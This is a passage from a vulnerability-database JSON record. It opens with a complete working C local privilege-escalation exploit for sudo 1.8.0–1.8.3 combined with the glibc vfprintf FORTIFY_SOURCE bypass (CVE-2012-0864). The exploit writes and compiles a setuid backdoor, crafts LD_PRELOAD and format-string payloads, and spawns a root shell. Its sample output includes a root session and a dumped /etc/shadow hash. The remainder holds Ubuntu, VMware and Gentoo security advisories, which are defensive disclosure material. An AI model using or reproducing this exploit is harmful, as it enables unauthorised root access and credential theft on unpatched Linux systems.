A\ufffd\u001bAF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001f\u0002' from LD_PRELOAD cannot be preloaded: ignored.\n %1073825311%21372736 %: settings: \n=\n %1073825311%21372736 %: settings: \n=\n %1073825311%21372736 %: sudo_mode 1081383169\nSorry, try again.\nSorry, try again.\nSorry, try again.\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\n %1073886251%21372736 %: policy plugin returns 1081402445\n[+] Getting root..!\n[+] Cleaning system.\n[+] Launching root shell!\nsh-4.2# id; uname -a\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\nLinux localhost.localdomain 
3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\nsh-4.2# head -n1 /etc/shadow\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\nsh-4.2#\n*/\n\n#include <sys/resource.h>\n#include <sys/utsname.h>\n#include <gnu/libc-version.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <sys/time.h>\n#include <sys/stat.h>\n#include <string.h>\n#include <sys/wait.h>\n\n#define OFFSET 65000\n#define NUM_THREADS 0\n\n/* files that we create on disk */\n#define BACKDOOR \"e.c\"\n#define BD_COMPILED \"e\"\n#define SUDO_ASKPASS \"e.sh\"\n\nextern char **environ;\nstruct utsname ver;\n\nvoid *kill_sudo();\nvoid *pop_shell();\nvoid *set_env();\nint is_glibc_vuln();\nint is_sudo_vuln();\nint write_backdoor();\n\n/* hardcoded path to sudo */\nconst char sudo[] = \"/usr/bin/sudo\\0\";\nchar s_version[20];\n\n/* vuln versions of sudo */\nchar vuln_sudo_versions[4][20] = {\n {\"1.8.0\"},\n {\"1.8.1\"},\n {\"1.8.2\"},\n {\"1.8.3\"}\n};\n\n/* vuln versions of glibc */\nchar vuln_glibc_versions[4][20] = {\n {\"2.14.90\"},\n};\n\nint main(int argc, char *argv[])\n{\n struct rlimit rara;\n int status;\n char ready;\n uname(&ver);\n printf(\"[+] Targeting release: %s\\n\", ver.release);\n if (is_glibc_vuln()){\n if(is_sudo_vuln()){\n if (write_backdoor()){\n printf(\"[+] Press enter when ready...\");\n scanf(\"%c\", &ready);\n }else{ exit(0); }\n }else{ exit(0); }\n }else{ exit(0); }\n\n // ulimited stack\n rara.rlim_max = rara.rlim_cur = -1;\n setrlimit(RLIMIT_STACK, &rara);\n\n pid_t pid;\n if((pid = fork()) < 0)\n {\n printf(\"[-] An error occurred while forking sudo\\n\");\n return -1;\n }\n else if(pid == 0){\n set_env();\n kill_sudo();\n }else{\n wait(&status);\n if (WIFEXITED(status)) {\n sleep(1);\n pop_shell();\n }\n }\n}\n\nint is_glibc_vuln(){\n int i, returnval = -1;\n for (i = 0; i < 4; i++){\n if (strcmp(gnu_get_libc_version(), 
vuln_glibc_versions[i]) == 0){\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\n returnval = 1;\n }\n }\n return returnval;\n};\n\nint is_sudo_vuln(){\n int i, returnval = -1;;\n FILE *fp;\n char path[20];\n char sudo_ver_cmd[50];\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\n fp = popen(sudo_ver_cmd, \"r\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\n exit(0);\n }\n fgets(path, 21, fp);\n memmove (s_version, path+13,5);\n for (i = 0; i < 4; i++){\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\n returnval = 1;\n }\n }\n return returnval;\n};\n\nint write_backdoor(){\n int returnval = 1;\n char askpass[100], compile_bd[100];\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\n \"#include <stdlib.h>\\r\\n\"\n \"int main(int argc, char **argv){\\r\\n\"\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\n \" setresuid(0,0,0);\\r\\n\"\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\n \" system(\\\"/bin/sh\\\");\\r\\n\"\n \" exit(0);\\r\\n\"\n \"}\\r\\n\";\n\n FILE *fp = fopen(BACKDOOR,\"wb\");\n if (fp == NULL) {\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\n returnval = -1;\n }else{\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\n }\n\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\n memset(compile_bd, 0x00, sizeof(compile_bd));\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\n fp = popen(compile_bd, \"r\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\n returnval = -1;\n }\n\n fclose(fp);\n memset(askpass, 0x00, sizeof(askpass));\n snprintf(askpass, 
sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\n fp = fopen(SUDO_ASKPASS,\"w\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\n returnval = -1;\n }else{\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\n }\n\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\n chmod(SUDO_ASKPASS, 0755);\n return returnval;\n};\n\nvoid *set_env(){\n int i = 0;\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\n char sudo_askpass_evar[40];\n for (i=0; i<(OFFSET/4); i++){\n memcpy(user_details+(i*4), user_details, sizeof(int));\n }\n\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\n\n // set our environment\n putenv(ld_preload_evar);\n putenv(sudo_askpass_evar);\n};\n\nvoid *kill_sudo(){\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\n\n // trigger the vuln\n execve(sudo, args, environ);\n};\n\nvoid *pop_shell(){\n // set our environment\n unsetenv(\"LD_PRELOAD\");\n unsetenv(\"SUDO_ASKPASS\");\n char *exploit_args[] = { BD_COMPILED, NULL };\n execve(BD_COMPILED, exploit_args, environ);\n};", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2011-2702"], "description": "memcpy() integer overflow, RPC DoS, vfprintf() integer overflow.", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:VULN:12241", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12241", "title": "glibc multiple security vulnerabilities", "type": 
"securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1396-1\r\nMarch 09, 2012\r\n\r\neglibc, glibc vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nMultiple vulnerabilities were discovered and fixed in the GNU C Library.\r\n\r\nSoftware Description:\r\n- eglibc: Embedded GNU C Library: sources\r\n- glibc: GNU C Library: Documentation\r\n\r\nDetails:\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\ninteger overflows in the timezone handling code. An attacker could use\r\nthis to possibly execute arbitrary code by convincing an application\r\nto load a maliciously constructed tzfile. (CVE-2009-5029)\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\npasswd.adjunct.byname map entries in the Network Information Service\r\n(NIS) code in the name service caching daemon (nscd). An attacker\r\ncould use this to obtain the encrypted passwords of NIS accounts.\r\nThis issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\r\n\r\nChris Evans reported that the GNU C Library did not properly\r\ncalculate the amount of memory to allocate in the fnmatch() code. 
An\r\nattacker could use this to cause a denial of service or possibly\r\nexecute arbitrary code via a maliciously crafted UTF-8 string.\r\nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1071)\r\n\r\nTomas Hoger reported that an additional integer overflow was possible\r\nin the GNU C Library fnmatch() code. An attacker could use this to\r\ncause a denial of service via a maliciously crafted UTF-8 string. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\r\nand Ubuntu 11.04. (CVE-2011-1659)\r\n\r\nDan Rosenberg discovered that the addmntent() function in the GNU C\r\nLibrary did not report an error status for failed attempts to write to\r\nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab,\r\npossibly causing a denial of service or otherwise manipulate mount\r\noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS,\r\nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\r\n\r\nHarald van Dijk discovered that the locale program included with the\r\nGNU C library did not properly quote its output. This could allow a\r\nlocal attacker to possibly execute arbitrary code using a crafted\r\nlocalization string that was evaluated in a shell script. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1095)\r\n\r\nIt was discovered that the GNU C library loader expanded the\r\n$ORIGIN dynamic string token when RPATH is composed entirely of this\r\ntoken. This could allow an attacker to gain privilege via a setuid\r\nprogram that had this RPATH value. (CVE-2011-1658)\r\n\r\nIt was discovered that the GNU C library implementation of memcpy\r\noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3)\r\ncontained a possible integer overflow. An attacker could use this to\r\ncause a denial of service or possibly execute arbitrary code. This\r\nissue only affected Ubuntu 10.04 LTS. 
(CVE-2011-2702)\r\n\r\nJohn Zimmerman discovered that the Remote Procedure Call (RPC)\r\nimplementation in the GNU C Library did not properly handle large\r\nnumbers of connections. This could allow a remote attacker to cause\r\na denial of service. (CVE-2011-4609)\r\n\r\nIt was discovered that the GNU C Library vfprintf() implementation\r\ncontained a possible integer overflow in the format string protection\r\ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in\r\nconjunction with a format string vulnerability to bypass the format\r\nstring protection and possibly execute arbitrary code. (CVE-2012-0864)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libc6 2.13-20ubuntu5.1\r\n\r\nUbuntu 11.04:\r\n libc6 2.13-0ubuntu13.1\r\n\r\nUbuntu 10.10:\r\n libc-bin 2.12.1-0ubuntu10.4\r\n libc6 2.12.1-0ubuntu10.4\r\n\r\nUbuntu 10.04 LTS:\r\n libc-bin 2.11.1-0ubuntu7.10\r\n libc6 2.11.1-0ubuntu7.10\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu8.1\r\n\r\nAfter a standard system update you need to restart all services or\r\nreboot your computer to make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1396-1\r\n CVE-2009-5029, CVE-2010-0015, CVE-2011-1071, CVE-2011-1089,\r\n CVE-2011-1095, CVE-2011-1658, CVE-2011-1659, CVE-2011-2702,\r\n CVE-2011-4609, CVE-2012-0864\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-20ubuntu5.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-0ubuntu13.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.12.1-0ubuntu10.4\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.10\r\n https://launchpad.net/ubuntu/+source/glibc/2.7-10ubuntu8.1\r\n", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:DOC:27743", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27743", "title": "[USN-1396-1] GNU C 
Library vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2012-0018\r\nSynopsis: VMware security updates for vCSA and ESXi\r\nIssue date: 2012-12-20\r\nUpdated on: 2012-12-20 (initial advisory)\r\nCVE numbers: ------------- vCSA ---------------\r\n CVE-2012-6324, CVE-2012-6325\r\n ------------- glibc --------------\r\n CVE-2009-5029, CVE-2009-5064, CVE-2010-0830,\r\n CVE-2011-1089, CVE-2011-4609, CVE-2012-0864,\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406,\r\n CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware has updated vCenter Server Appliance (vCSA) and ESX to \r\n address multiple security vulnerabilities\r\n\r\n2. Relevant releases\r\n\r\n vCenter Server Appliance 5.1 without Patch 1\r\n vCenter Server Appliance 5.0 without Update 2\r\n\r\n VMware ESXi 5.1 without patch ESXi510-201212101\r\n VMware ESXi 5.0 without patch ESXi500-201212101\r\n\r\n3. Problem Description\r\n\r\n a. vCenter Server Appliance directory traversal\r\n\r\n The vCenter Server Appliance (vCSA) contains a directory\r\n traversal vulnerability that allows an authenticated \r\n remote user to retrieve arbitrary files. Exploitation of\r\n this issue may expose sensitive information stored on the \r\n server. 
\r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2012-6324 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux vCSA 5.1 Patch 1\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\n b. vCenter Server Appliance arbitrary file download\r\n\r\n The vCenter Server Appliance (vCSA) contains an XML parsing \r\n vulnerability that allows an authenticated remote user to\r\n retrieve arbitrary files. Exploitation of this issue may\r\n expose sensitive information stored on the server.\r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2012-6325 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux not affected\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\nc. 
Update to ESX glibc package\r\n\r\n The ESX glibc package is updated to version glibc-2.5-81.el5_8.1\r\n to resolve multiple security issues.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the names CVE-2009-5029, CVE-2009-5064,\r\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, CVE-2012-0864\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406 and CVE-2012-3480\r\n to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n ESXi 5.1 ESXi ESXi510-201212101\r\n ESXi 5.0 ESXi ESXi500-201212101\r\n ESXi 4.1 ESXi no patch planned\r\n ESXi 4.0 ESXi no patch planned\r\n ESXi 3.5 ESXi not applicable\r\n\r\n ESX any ESX not applicable\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and\r\n version and verify the checksum of your downloaded file.\r\n\r\n\r\n ESXi and ESX\r\n ------------\r\n The download for ESXi includes vCenter Server Appliance.\r\n\r\n\r\n https://downloads.vmware.com/go/selfsupport-download\r\n\r\n ESXi 5.1\r\n http://kb.vmware.com/kb/2035775\r\n\r\n ESXi 5.0\r\n http://kb.vmware.com/kb/2033751\r\n\r\n5. 
References\r\n\r\n ------------- vCSA ---------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6324\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6325\r\n ------------- glibc --------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5064\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0830\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1089\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4609\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0864\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3404\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3405\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3406\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2012-12-20 VMSA-2012-0018\r\n Initial security advisory in conjunction with the release of\r\n vSphere 5.1 Patch 1 and vSphere 5.0 Update 2 on 2012-12-20.\r\n\r\n- --------------------------------------------------------------------\r\n\r\n7. 
Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware security response policy\r\n http://www.vmware.com/support/policies/security_response.html\r\n\r\n General support life cycle policy\r\n http://www.vmware.com/support/policies/eos.html\r\n\r\n VMware Infrastructure support life cycle policy\r\n http://www.vmware.com/support/policies/eos_vi.html\r\n\r\n Copyright 2012 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 2599)\r\nCharset: utf-8\r\n\r\nwj8DBQFQ01bsDEcm8Vbi9kMRAkXEAJoClYysvoV67RKiZ0uN1YszPcN0LQCg8QMV\r\nOWjpV7Bnt27472i5EOhk9fI=\r\n=jrDP\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "id": "SECURITYVULNS:DOC:28907", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28907", "title": "VMSA-2012-0018 VMware security updates for vCSA and ESXi", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2010-3847", "CVE-2009-5029", "CVE-2011-0536", "CVE-2011-1089"], "edition": 1, "description": "### Background\n\nThe GNU C library is the standard C library used by Gentoo Linux systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in GNU C Library. 
Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker could trigger vulnerabilities in the dynamic library loader, making it possible to load attacker-controlled shared objects during execution of setuid/setgid programs to escalate privileges. \n\nA context-dependent attacker could trigger various vulnerabilities in the GNU C Library, including a buffer overflow, leading to execution of arbitrary code or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU C Library users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-libs/glibc-2.15-r3\"", "modified": "2013-12-03T00:00:00", "published": "2013-12-03T00:00:00", "id": "GLSA-201312-01", "href": "https://security.gentoo.org/glsa/201312-01", "type": "gentoo", "title": "GNU C Library: Multiple vulnerabilities", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:30:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "It was discovered that the GNU C Library did not properly handle \ninteger overflows in the timezone handling code. An attacker could use \nthis to possibly execute arbitrary code by convincing an application \nto load a maliciously constructed tzfile. (CVE-2009-5029)\n\nIt was discovered that the GNU C Library did not properly handle \npasswd.adjunct.byname map entries in the Network Information Service \n(NIS) code in the name service caching daemon (nscd). An attacker \ncould use this to obtain the encrypted passwords of NIS accounts. \nThis issue only affected Ubuntu 8.04 LTS. 
(CVE-2010-0015)\n\nChris Evans reported that the GNU C Library did not properly \ncalculate the amount of memory to allocate in the fnmatch() code. An \nattacker could use this to cause a denial of service or possibly \nexecute arbitrary code via a maliciously crafted UTF-8 string. \nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1071)\n\nTomas Hoger reported that an additional integer overflow was possible \nin the GNU C Library fnmatch() code. An attacker could use this to \ncause a denial of service via a maliciously crafted UTF-8 string. This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 \nand Ubuntu 11.04. (CVE-2011-1659)\n\nDan Rosenberg discovered that the addmntent() function in the GNU C \nLibrary did not report an error status for failed attempts to write to \nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab, \npossibly causing a denial of service or otherwise manipulate mount \noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, \nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\n\nHarald van Dijk discovered that the locale program included with the \nGNU C library did not properly quote its output. This could allow a \nlocal attacker to possibly execute arbitrary code using a crafted \nlocalization string that was evaluated in a shell script. This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1095)\n\nIt was discovered that the GNU C library loader expanded the \n$ORIGIN dynamic string token when RPATH is composed entirely of this \ntoken. This could allow an attacker to gain privilege via a setuid \nprogram that had this RPATH value. (CVE-2011-1658)\n\nIt was discovered that the GNU C library implementation of memcpy \noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3) \ncontained a possible integer overflow. An attacker could use this to \ncause a denial of service or possibly execute arbitrary code. 
This \nissue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\n\nJohn Zimmerman discovered that the Remote Procedure Call (RPC) \nimplementation in the GNU C Library did not properly handle large \nnumbers of connections. This could allow a remote attacker to cause \na denial of service. (CVE-2011-4609)\n\nIt was discovered that the GNU C Library vfprintf() implementation \ncontained a possible integer overflow in the format string protection \ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in \nconjunction with a format string vulnerability to bypass the format \nstring protection and possibly execute arbitrary code. (CVE-2012-0864)", "edition": 5, "modified": "2012-03-09T00:00:00", "published": "2012-03-09T00:00:00", "id": "USN-1396-1", "href": "https://ubuntu.com/security/notices/USN-1396-1", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:37", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6326", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "a. vCenter Server Appliance directory traversal \n \n\n\nThe vCenter Server Appliance (vCSA) contains a directory traversal vulnerability that allows an authenticated remote user to retrieve arbitrary files. Exploitation of this issue may expose sensitive information stored on the server. \n \nVMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-6324 to this issue. 
\n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 4, "modified": "2013-04-25T00:00:00", "published": "2012-12-20T00:00:00", "id": "VMSA-2012-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0018.html", "title": "VMware security updates for vCSA, vCenter Server, and ESXi", "type": "vmware", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-06T16:05:38", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-3188", "CVE-2011-4108", "CVE-2011-4609", "CVE-2011-4128", "CVE-2012-0815", "CVE-2011-3597", "CVE-2011-4324", "CVE-2011-4110", "CVE-2011-4576", "CVE-2011-4577", "CVE-2010-4180", "CVE-2010-4410", "CVE-2011-2699", "CVE-2011-4619", "CVE-2010-2761", "CVE-2011-4132", "CVE-2011-0014", "CVE-2010-0830", "CVE-2011-2484", "CVE-2012-1583", "CVE-2012-0061", "CVE-2012-0393", "CVE-2011-3209", "CVE-2012-0050", "CVE-2011-3363", "CVE-2012-0060", "CVE-2011-1833", "CVE-2012-0207", "CVE-2011-1020", "CVE-2012-2110", "CVE-2012-1569", "CVE-2010-4252", "CVE-2012-0841", "CVE-2009-5029", "CVE-2011-4325", "CVE-2012-1573", "CVE-2011-4109", "CVE-2011-1089", "CVE-2009-5064", "CVE-2011-2496"], "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31 \nThe Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. 
\n\n", "edition": 4, "modified": "2012-12-20T00:00:00", "published": "2012-08-30T00:00:00", "id": "VMSA-2012-0013", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0013.html", "title": "VMware vSphere and vCOps updates to third party libraries", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}